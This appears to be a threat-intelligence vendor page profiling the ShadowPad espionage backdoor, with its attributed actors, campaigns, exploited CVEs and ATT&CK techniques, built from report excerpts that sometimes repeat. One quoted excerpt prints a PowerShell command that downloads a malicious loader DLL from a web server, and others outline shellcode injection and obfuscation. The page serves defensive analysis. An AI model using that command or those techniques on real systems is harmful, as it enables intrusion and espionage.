ShadowPad is a privately developed modular backdoor associated with Chinese cyber-espionage activity and shared across multiple China-aligned intrusion sets rather than being exclusive to a single actor. It is widely regarded as a successor or companion to PlugX in parts of the Chinese intrusion ecosystem and has been linked in public reporting to operations involving groups such as APT41, RedFoxtrot, Tonto Team, and other China-nexus clusters. Its use has repeatedly appeared in strategic espionage campaigns targeting government, defense, research, telecommunications, and critical infrastructure entities across Asia and beyond.
ShadowPad is designed for long-term covert access and post-compromise control. Reported behavior includes maintaining an internal configuration block and a virtual file system through Windows Registry storage, enabling operators to preserve malware state and manage modules while reducing obvious filesystem artifacts. As a backdoor, it is used to establish command-and-control communications and support broader espionage objectives after initial compromise. Public reporting also ties ShadowPad infrastructure to sustained victim monitoring and clustered command-and-control activity across multiple campaigns.
The malware has figured prominently in high-profile China-linked operations against critical infrastructure and state institutions. It was observed in campaigns targeting India’s power sector, including activity tracked as RedEcho, where ShadowPad-linked infrastructure was assessed as consistent with strategic pre-positioning rather than ordinary economic espionage. It was also observed in sustained intrusions against Pakistani law-enforcement organizations, including systems handling biometric, criminal, personnel, and citizen-service data. In those cases, ShadowPad activity was grouped with other China-linked tooling and victimology, reinforcing its role as a common shared espionage platform within the Chinese contractor and state-aligned ecosystem.
ShadowPad’s significance extends beyond its technical capabilities because it exemplifies the commercialization and sharing of offensive tooling within the Chinese cyber ecosystem. Reporting has described it as a privately developed backdoor sold or shared among multiple suspected PLA- and contractor-linked entities, making attribution based solely on its presence unreliable. In practice, ShadowPad is best understood as a mature espionage backdoor platform used by multiple Chinese threat clusters for stealthy persistence, command-and-control, and long-duration intelligence collection on Windows networks.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
19 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
In May 2024, CVE-2024-24919, an information disclosure vulnerability in Check Point Quantum Security Gateways was exploited in the wild and tied to NailaoLocker ransomware (distributed via ShadowPad and PlugX backdoors, as documented by Orange Cyberdefense CERT).
Once access was established, SHADOW-EARTH-053 deployed ShadowPad, a modular malware family historically associated with multiple China-aligned intrusion sets, including APT41. The group relied heavily on DLL sideloading techniques involving signed legitimate executables.
Once access was established, SHADOW-EARTH-053 deployed ShadowPad, a modular malware family historically associated with multiple China-aligned intrusion sets, including APT41. The group relied heavily on DLL sideloading techniques involving signed legitimate executables.
Once access was established, SHADOW-EARTH-053 deployed ShadowPad, a modular malware family historically associated with multiple China-aligned intrusion sets, including APT41. The group relied heavily on DLL sideloading techniques involving signed legitimate executables.
Once access was established, SHADOW-EARTH-053 deployed ShadowPad, a modular malware family historically associated with multiple China-aligned intrusion sets, including APT41. The group relied heavily on DLL sideloading techniques involving signed legitimate executables.
ShadowPad is a modular remote access Trojan (RAT) that is closely associated with China-based APT groups. Because of its modular nature, ShadowPad can be continuously updated with new functionalities.
Among our finds on the server were utilities for lateral movement... The server had the following utilities: Utilities to check for and exploit vulnerability MS17-010... The hackers tweaked the functionality of the MS17-010 utility by adding the ability to check an entire subnet.
In their latest campaign, the actor leverages one of the latest WinRAR vulnerabilities that will ultimately lead to running shellcode... Rule names: EE_Loader EE_Dropper WinRAR_ADS_Traversal References / Resources: WinRAR CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-8088
The malware payloads seen in campaigns investigated by Microsoft Defender vary from remote access trojans (RATs) like VShell and EtherRAT, the SNOWLIGHT memory-based malware downloader that enabled attackers to deploy more payloads to target environments, ShadowPAD, and XMRig cryptominers. | CVE-2025-55182 (also referred to as React2Shell and includes CVE-2025-66478, which was merged into it) is a critical pre-authentication remote code execution (RCE) vulnerability affecting React Server Components, Next.js, and related frameworks.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a flaw in TrueConf Client, tracked as CVE-2026-3502 (CVSS score of 7.8), to its Known Exploited Vulnerabilities (KEV) catalog. CVE-2026-3502 is a flaw in TrueConf Client that allows it to download and install updates without verifying them. Attackers who can tamper with the update source can deliver malicious files, leading to arbitrary code execution on the system.
NetSarang Xmanager Enterprise 5.0 Build 1232, Xmanager 5.0 Build 1045, Xshell 5.0 Build 1322, Xftp 5.0 Build 1218, and Xlpd 5.0 Build 1220 contain a malicious nssock2.dll that implements a multi-stage, DNS-based backdoor. | References include https://securelist.com/shadowpad-in-corporate-networks/81432/ and a Kaspersky press release about 'ShadowPad attackers' hiding a backdoor in software used by hundreds of large companies worldwide. The description states the malicious nssock2.dll implements a multi-stage, DNS-based backdoor.
They also took advantage of specific software weaknesses, such as CVE-2024-8963 and CVE-2024-8190, sometimes even exploiting them before these vulnerabilities were publicly disclosed. | A key piece of malicious software was ShadowPad, described as a “closed-source modular backdoor platform” often used by these Chinese-linked groups to spy and gain remote access.
They also took advantage of specific software weaknesses, such as CVE-2024-8963 and CVE-2024-8190, sometimes even exploiting them before these vulnerabilities were publicly disclosed. | A key piece of malicious software was ShadowPad, described as a “closed-source modular backdoor platform” often used by these Chinese-linked groups to spy and gain remote access.
“We also discovered that APT41 created a tailored loader to inject a proof-of-concept for CVE-2018-0824 directly into memory, utilizing a remote code execution vulnerability to achieve local privilege escalation.” / “During the compromise the threat actor attempts to exploit CVE-2018-0824, with a tool called UnmarshalPwn …”
...эксплуатации цепочки уязвимостей ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
...эксплуатации цепочки уязвимостей ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
...источником их заражения оказался почтовый сервер Exchange, который оказался скомпрометированным еще летом 2024 года с помощью эксплуатации цепочки уязвимостей ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
...ShadowPad Malware Actively Exploits WSUS Vulnerability... exploiting CVE-2025-59287 for initial access...
...exploited a public-facing Citrix NetScaler Gateway appliance, likely CVE-2023-3519, for initial access and deployed SnappyBee (also known as Deed RAT)... CVE-2023-3519 is a critical remote code execution (RCE) vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway appliances.
30 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
From mid-2020 onwards, Recorded Future’s midpoint collection revealed a steep rise in the use of infrastructure tracked as AXIOMATICASYMPTOTE, which encompasses ShadowPad command and control (C2) servers, to target a large swathe of India’s power sector.
From mid-2020 onwards, Recorded Future’s midpoint collection revealed a steep rise in the use of infrastructure tracked as AXIOMATICASYMPTOTE, which encompasses ShadowPad command and control (C2) servers, to target a large swathe of India’s power sector.
From mid-2020 onwards, Recorded Future’s midpoint collection revealed a steep rise in the use of infrastructure tracked as AXIOMATICASYMPTOTE, which encompasses ShadowPad command and control (C2) servers, to target a large swathe of India’s power sector.
Their toolkit includes ShadowPad, Spyder, Cobalt Strike, FunnySwitch, and the BIOPASS RAT, and expanding SprySOCKS to Windows clearly shows continued investment in offensive capability.
Operators used implants – such as ShadowPad, SodaMaster, and Spyder – that are common or exclusive to China-aligned threat actors.
This campaign is also the first documented time FamousSparrow used ShadowPad, a privately sold backdoor... The final payloads were SparrowDoor and ShadowPad.
35 distinct techniques documented for this family, organized by ATT&CK tactic.
Upon execution, some of the payloads will achieve persistence by either creating a scheduled task or a service.
Backdoors shared among Chinese groups, including PlugX and ShadowPad, anchored the China-nexus assessments
At Victim D, the loader was downloaded using the following PowerShell command: powershell (new-object System.Net.WebClient).DownloadFile("http://<victim’s_web_server_IP_address>/Images/menu/log.dll";"c:\users\public\log.dll")
At Victim D, the attackers gained access to an admin console and used it to deploy implants on other machines in the local network.
This functionality is achieved by utilizing the Windows native functions NtAllocateVirtualMemory and NtCreateThreadEx... The sample will allocate an RWX-protected memory region using the VirtualAlloc Windows API, then write the shellcode to the memory region and pass execution to it.
Upon execution, some of the payloads will achieve persistence by either creating a scheduled task or a service.
During the 2015 Ukraine Electric Power Attack, Sandworm Team modified in-registry Internet settings to lower internet security before launching rundll32.exe ... AADInternals can modify registry keys ... ADVSTORESHELL is capable of setting and deleting Registry values ... [many additional examples].
Upon execution, some of the payloads will achieve persistence by either creating a scheduled task or a service.
Another command, ID 0x43, is particularly noteworthy as it allows the attacker to execute shellcode in the memory of the same process... using NtAllocateVirtualMemory and NtCreateThreadEx... Once log.dll is loaded, it will spawn Microsoft Windows Media Player (wmplayer.exe) and dllhost.exe, injecting into them.
DOORME XOR-encrypts strings to evade detection... The malware employs a technique that can cause disassemblers to incorrectly split functions... The malware in question also employs a technique known as Control Flow Obfuscation... Dynamic import table resolution... log.dll incorporates a code-scattering obfuscation technique to frustrate static analysis.
ScatterBrain is a sophisticated obfuscating compiler that integrates multiple operational modes and protection components to significantly complicate the analysis of the binaries it generates.
Complete Import Protection: ScatterBrain employs a complete protection of a binary's import table, making it extremely difficult to understand how the binary interacts with the underlying operating system.
DOORME first resolves the address of LoadLibraryA and GetProcAddress Windows API by parsing the kernel32.dll module export table... The sample uses the common Ldr crawling technique to find the address of kernel32.dll... It uses GetProcAddress to resolve imports as needed.
Selective or Full Control Flow Graph (CFG) Obfuscation: This technique restructures the program's control flow, making it very difficult to analyze and create detection rules for.
The researchers also found malicious files disguised as software updates planted directly on Balochistan Police’s public Complaint Management System.
Another command, ID 0x43, is particularly noteworthy as it allows the attacker to execute shellcode in the memory of the same process... using NtAllocateVirtualMemory and NtCreateThreadEx... Once log.dll is loaded, it will spawn Microsoft Windows Media Player (wmplayer.exe) and dllhost.exe, injecting into them.
Finally, the decrypted payload is injected into a wmplayer.exe process (Windows Media Player).
The content repeatedly describes malware and threat actors decoding, decrypting, deobfuscating, or unpacking payloads, strings, configuration data, commands, and C2 responses prior to execution or use.
The REF2924 intrusion set, using SIESTAGRAPH, DOORME, SHADOWPAD, and the system binary proxy execution technique (among others) represents an attack group...
During the 2015 Ukraine Electric Power Attack, Sandworm Team modified in-registry Internet settings to lower internet security before launching rundll32.exe ... AADInternals can modify registry keys ... ADVSTORESHELL is capable of setting and deleting Registry values ... [many additional examples].
The content repeatedly describes malware and threat actors using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, nbtstat, netsh, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, domains, and network adapter/interface details.
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.
The content is a long ATT&CK-style listing of malware and threat actors that collect host details such as OS version, hostname, architecture, CPU, memory, BIOS, language, and other basic system characteristics; examples include use of commands like systeminfo, ver, uname, sw_vers, and WMI queries.
Our analysis of C2 netflow data revealed that suspected China- and India-nexus threat actors operating PlugX, ShadowPad, Cobalt Strike, and Remcos infrastructure have converged on this victim class.
221 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
ShadowPad4
A malware family used in the observed espionage activity; the content notes ShadowPad is traditionally linked to Chinese state-sponsored groups.
ShadowPad was deployed in espionage activity against Pakistani law enforcement; the content describes it as a successor to PlugX and says its victimology aligns with China-linked intelligence collection.
ShadowPad was identified as one of the malware clusters involved in the long-running espionage intrusions against Pakistani police networks.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.